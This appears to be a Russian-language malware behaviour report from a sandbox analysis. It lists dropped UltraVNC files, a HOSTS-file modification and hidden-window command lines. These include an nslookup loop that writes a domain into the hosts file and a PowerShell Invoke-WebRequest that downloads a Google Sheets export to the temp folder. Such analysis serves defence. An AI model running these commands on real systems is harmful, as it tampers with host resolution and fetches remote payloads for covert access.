Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\ultravnc.ini
- %TEMP%\winvnc.exe
- %TEMP%\vnchooks.dll
Изменяет файл HOSTS.
Сетевая активность
TCP
- '85#.co.il':443
UDP
- DNS ASK 85#.co.il
Другое
Ищет следующие окна
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
Создает и запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c for /f "usebackq tokens=2" %a in (`nslookup 850.co.il. 8.8.8.8 ^| find /v "8.8.8.8" ^| find "Address:"`) do echo %a 850.co.il >> <DRIVERS>\etc\hosts' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c powershell Invoke-WebRequest -Uri "'https://docs.google.com/spreadsheets/d/1CUv4c4tY-nFFiXkTN2ISLda5noxOsuJU4FvPXRzZCC8/export?gid=833149192&format=tsv'" -OutFile "$env:temp\CloudObject.xml"...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c for /f "usebackq tokens=2" %a in (`nslookup 850.co.il. 8.8.8.8 ^| find /v "8.8.8.8" ^| find "Address:"`) do echo %a 850.co.il >> <DRIVERS>\etc\hosts
- '%WINDIR%\syswow64\cmd.exe' /c nslookup 850.co.il. 8.8.8.8 | find /v "8.8.8.8" | find "Address:"
- '%WINDIR%\syswow64\nslookup.exe' 850.co.il. 8.8.8.8
- '%WINDIR%\syswow64\find.exe' /v "8.8.8.8"
- '%WINDIR%\syswow64\find.exe' "Address:"
- '%WINDIR%\syswow64\cmd.exe' /c powershell Invoke-WebRequest -Uri "'https://docs.google.com/spreadsheets/d/1CUv4c4tY-nFFiXkTN2ISLda5noxOsuJU4FvPXRzZCC8/export?gid=833149192&format=tsv'" -OutFile "$env:temp\CloudObject.xml"...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Invoke-WebRequest -Uri "'https://docs.google.com/spreadsheets/d/1CUv4c4tY-nFFiXkTN2ISLda5noxOsuJU4FvPXRzZCC8/export?gid=833149192&format=tsv'" -OutFile "$env:temp\CloudObject.xml"
